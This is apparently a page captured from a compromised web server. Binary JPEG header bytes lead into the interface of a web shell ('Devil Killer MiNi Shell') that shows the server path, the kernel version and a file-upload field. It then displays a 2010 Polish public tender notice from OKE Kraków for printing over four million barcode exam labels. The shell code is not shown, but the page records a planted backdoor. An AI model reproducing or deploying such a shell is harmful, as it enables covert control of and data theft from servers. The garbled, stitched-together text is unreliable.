JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100217/45820-N-2010.html

<p class="kh_header"><b>Kraków: Druk, konfekcjonowanie i dostawa ponad 4 miliony szt. różnych spersonalizowanych etykiet samoprzylepnych z kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych w 2010 r. na terenie trzech województw objętym działaniem OKE w Krakowie</b><br>
<b>Numer ogłoszenia: 45820 - 2010; data zamieszczenia: 17.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowa Komisja Egzaminacyjna w Krakowie , al. marsz. Ferdinanda Focha 39, 30-119 Kraków, woj. małopolskie, tel. 012 6181201, 202, 203, faks 012 6181200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www,oke.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka budżetowa nadzorowana przez MEN, utworzona na podstawie Ustawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk, konfekcjonowanie i dostawa ponad 4 miliony szt. różnych spersonalizowanych etykiet samoprzylepnych z kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych w 2010 r. na terenie trzech województw objętym działaniem OKE w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk, konfekcjonowanie i dostawa na miejsce wskazane przez OKE w Krakowie, ok. 4000000 (cztery miliony) szt. różnych spersonalizowanych etykiet samoprzylepnych zadrukowanych kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych na terenie objętym działaniem OKE w Krakowie w 2010 r.  
Numery i odpowiadające im kody kreskowe powinny być wydrukowane na papierowych, półmatowych etykietach samoprzylepnych, na drukarkach termo transferowych o rozdzielczości 300 dpi lub równoważnych, zapewniających trwałość i jakość nadruku odpowiednią dla późniejszego skanowania.
Dla uzyskania pewności dobrej jakości druku, pozwalającego na bezbłędny odczyt kodu przez skanery, należy zastosować urządzenia do weryfikacji poprawności wydruku kodu kreskowego na etapie wykonania.
Zamawiający sugeruje wykonanie druku etykiet w dwóch rzędach na arkuszach, co ilustruje przykładowy wygląd fragmentu arkusza z etykietami, dla ucznia przystępującego do egzaminu maturalnego, stanowiący załącznik nr 5 do SIWZ. 

Opis przedmiotu zamówienia dotyczy podanych niżej akcji: 
(opis dotyczy szacunkowej liczby etykiet ustalonej na dzień sporządzenia SIWZ. W każdym z opisanych przypadków Wykonawca ustala ostateczną liczbę etykiet i szkół na podstawie uzyskanej od Zamawiającego bazy danych) 
1.	AKCJA SPRAWDZIAN 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
1.1. Dla uczniów: ok. 336088 szt. etykiet o wymiarach 5 x 4 cm na złożonych do wymiaru kopert arkuszach, po 4 szt. etykiet, które otrzyma każdy  z ok. 84022 uczniów przystępujących do sprawdzianu w ok. 3336 szkołach. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy  zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
-	1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
-	3 etykiety z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-bez odcinania arkusików dla każdego ucznia.
1.2. Dla szkół: ok. 140112 szt. etykiet o wymiarach 5 x 4 cm na osobnych złożonych do wymiaru kopert arkuszach z 42 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji szkół. Każdy z ok. 3336 arkuszy zawierać będzie etykiety, z nadrukiem wynikającym z tej samej jw. bazy danych Zamawiającego w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
-	41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
1.3. Ok. 3336 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na kopertę/koperty zawierające wyżej opisane etykiety. 

2.	AKCJA GIMNAZJUM
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
2.1.Dla uczniów: ok. 766152 szt. etykiet o wymiarach 5 x 4 cm na złożonych do wymiaru kopert  arkuszach, po 8 szt. etykiet, które otrzyma każdy  z ok. 95769  uczniów przystępujących do trzech części egzaminu gimnazjalnego w ok. 1742 szkołach. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
-	1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
-	7 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-bez odcinania arkusików dla każdego ucznia.

2.2. Dla szkół: ok. 73164 szt. etykiet o wymiarach 5 x 4 cm na osobnych złożonych do wymiaru kopert arkuszach z 42 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji szkół. Każdy z ok. 1742 arkuszy zawierać będzie etykiety wykonane z nadrukiem wynikającym z tej samej bazy danych Zamawiającego w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
-	41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
2.3. Ok. 1742 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na kopertę/koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 1 i 2:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm) zawierającą ujawnione dane identyfikacyjne szkoły, tożsame z zawartymi w niej etykietami z kodem kreskowym. Dla większej liczby kopert dla jednej szkoły, należy wprowadzić  oznaczenie liczby kopert, które może mieć postać np. 1z 2, 2 z 2.
-	Koperty pakowane będą w określonej kolejności, zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego, do pudeł dostosowanych do zawartości (dobór i zakup pudeł należy do Wykonawcy zamówienia). Pudła należy opisać danymi adresowymi Punktu Odbioru Prac i ewentualnie numerem kolejnym, gdy będzie więcej pudeł dla tego samego POP-u (dla 2 pudeł oznaczenie może mieć postać 1 z 2, 2 z 2).
- 	Pudła z kopertami należy dostarczyć na koszt Wykonawcy do wskazanych przez Zamawiającego miejsc w nieprzekraczalnym terminie wykonania zamówienia. (Wstępne dane adresowe dla 61 POP-ów sprawdzianu i egzaminu gimnazjalnego zawiera załącznik nr 8 do SIWZ). 
Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest podwykonawcom. 

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert (w czasie transportu i przed ich przekazaniem szkołom) z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Termin wymagany wykonania zamówienia dla sprawdzianu i egzaminu gimnazjalnego wg punktu 1 i 2 jw.: - 11 marzec 2010 r. 

3.	AKCJA MATURA  
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego: 
3.1. Dla uczniów : ok. 2067180 szt. etykiet o wymiarach 5 x 4 cm na arkuszach, po 20 szt., które otrzyma każdy z ok. 103359 uczniów przystępujący do egzaminu maturalnego, 
w ok. 1677 szkołach ponadgimnazjalnych. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy  zawierać będzie etykiety 
z dwoma rodzajami nadruku w tym:
-	1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
-	19 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-odcięte 20 szt. dla każdego ucznia.

3.2. Dla szkół: ok. 164346 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po 98 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji  1677 szkół. Arkusze zawierać będą etykiety z nadrukiem wynikającym z tej samej bazy danych Zamawiającego w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
-	97 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
3.3.	Ok. 1677 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 3:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm) zawierającą ujawnione dane identyfikacyjne szkoły, tożsame z zawartymi w niej etykietami z kodem kreskowym. Dla większej liczby kopert dla jednej szkoły, należy wprowadzić  oznaczenie liczby kopert, które może mieć postać np. 1z 2, 2 z 2.
-	Koperty pakowane będą w określonej kolejności, zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego, do pudeł dostosowanych do zawartości (dobór i zakup pudeł należy do Wykonawcy zamówienia). Pudła należy opisać danymi adresowymi Punktu Odbioru Prac i ewentualnie numerem kolejnym, gdy będzie więcej pudeł dla tego samego POP-u (dla 2 pudeł oznaczenie może mieć postać 1 z 2, 2 z 2).
- 	Pudła z kopertami należy dostarczyć na koszt Wykonawcy do wskazanych przez Zamawiającego miejsc w nieprzekraczalnym terminie określonym poniżej. (Wstępne dane adresowe dla 67 POP-ów maturalnych zawiera załącznik nr 8 do SIWZ). 
Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest podwykonawcom. 

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert (w czasie transportu i przed ich przekazaniem szkołom) z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Termin wykonania zamówienia dla egzaminu maturalnego:  - 21 kwiecień 2010 r.  

4.	AKCJA EGZAMIN ZAWODOWY - Zamawiający zastrzega sobie możliwość dokonania ostatecznych uzgodnień dla egzaminu zawodowego w późniejszym terminie !    
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego dla etapu pisemnego i praktycznego egzaminu:

4.1. Dla uczniów: ok. 369054 szt. etykiet o wymiarach 5 x 4 cm na arkuszach:
- po 2 szt., dla etapu pisemnego egzaminu w tym:
-	1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
-	1 szt. z kodem numerycznym szkoły, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi i napisem -OKE Kraków-,

- po 4 szt. dla etapu praktycznego egzaminu w tym:
-	1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
-	3 szt. z kodem numerycznym ośrodka, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi i napisem -OKE Kraków-,
które otrzyma każdy z ok. 61509 uczniów przystępujący do egzaminu pisemnego i praktycznego w 4100 szkołach zawodowych albo ośrodkach egzaminacyjnych .
Uwaga: Etykiety mają być dostarczone w arkuszach złożonych do formatu koperty bez odcinania ich dla każdego ucznia.
	  		
 
4.2. Dla szkół i ośrodków: ok. 82000 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po 20 szt., które przeznaczone są dla dyrekcji szkół. Każdy z ok. 4100 arkuszy zawierać będzie etykiety z  numerem i kodem kreskowym szkoły lub ośrodka w tym:
-1 etykieta z ujawnionymi danymi identyfikującymi szkołę lub ośrodek,
-19 etykiet z kodem numerycznym szkoły lub ośrodka i odpowiadającym mu kodem kreskowym i napisem -OKE Kraków-.

4.3. Ok. 4100 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty 
z zawartością etykiet, opisanych wyżej.

Uwaga: Na etykietach dla egzaminu zawodowego napis o treści - OKE Kraków- należy umieścić w dowolnym miejscu etykiety.		

Konfekcjonowanie etykiet dla akcji z poz. 4:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm). Całość materiałów tego zadania zapakowana zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego do pudeł (dobór i zakup pudeł należy do Wykonawcy zamówienia) dostarczona zostanie do wskazanych przez Zamawiającego miejsc - wstępnie przewiduje się, że będzie to biuro OKE w Krakowie, os. Szkolne 37. 

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert w czasie transportu i przed ich przekazaniem szkołom z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Termin wykonania zamówienia dla egzaminu zawodowego :  
- w sesji letniej 2010 - III dekada maja 2010,
- sesja zimowa 2011 - IV dekada grudnia 2010. 
Uściślenie terminu wykonania dokonane zostanie po przekazaniu przez Zamawiającego bazy danych do druku etykiet kodowych co nastąpi na minimum 7 dni przed wymaganym terminem realizacji.

       
W ramach niniejszego zamówienia Wykonawca zobowiązany będzie wykonać - o ile zaistnieje taka potrzeba - etykiety kodowe przeznaczone dla uczniów przystępujących do egzaminów w dodatkowych terminach, jak również dodrukować etykiety, których nie wydrukowano w terminie określonym w SIWZ.
W przypadku jakichkolwiek uchybień w wykonaniu zamówienia, które skutkowałyby zakłóceniem toku egzaminów przeprowadzanych z użyciem opisanych wyżej etykiet kodowych, Zamawiający zastrzega sobie możliwość wystąpienia z roszczeniem o stosowne odszkodowanie. 

Wykonawca zobowiązany jest do przestrzegania obowiązujących przepisów prawa 
w zakresie ochrony danych osobowych i niewykorzystywania uzyskanej od Zamawiającego bazy danych do innych celów niż wydruk etykiet kodowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w przypadku wystąpienia dodatkowego zapotrzebowania na etykiety kodowe w tym wykraczające poza zakres objęty postępowaniem a związanego z potrzebami OKE w Krakowie o wartości do 50 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.61-2, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia-nie spełnia: złożenie wraz z ofertą aktualnego odpisu z właściwego rejestru, albo aktualnego odpisu zaświadczenia o wpisie do ewidencji dzialalności gospodarczej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia- nie spełnia: złożenie z ofertą informacji zawierającej wykaz wykonanych minimum 3 usług (wykazywać nie więcej jak 5) w okresie ostatnich 3 lat, lub w okresie prowadzenia działalności gospodarczej, o ile jest on krótszy niż 3 lata, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, przy uzyskaniu przychodu z realizacji takich usług w podanej łącznie wysokości: 60 000 zł brutto w tym okresie (np. rocznie po 20 000 zł).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia-nie spełnia: złożenie wraz z ofertą wykazu informacji o liczbie urządzeń do drukowania kodów kreskowych i urządzeń do ich weryfikacji oraz informacji o liczbie etykiet możliwych do wykonania w okresie 8 godzin pracy wraz z konfekcjonowaniem i pakowaniem (wymagane 80000 etykiet na 1 zmianę)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia-nie spełnia: złożenie wraz z ofertą wykazu informacji o liczebności zasobów ludzkich wykonawcy do uzyskania zdolności wykonania etykiet w wymaganej liczbie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty określone w SIWZ:formularz ofertowy, formularz cenowy oferty, pełnomocnictwa, oświadczenie (lub aktualne zaświadczenie) , że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne, oraz wykaz informacji wg załącznika do SIWZ i pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia, jeżeli jest wymagane.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
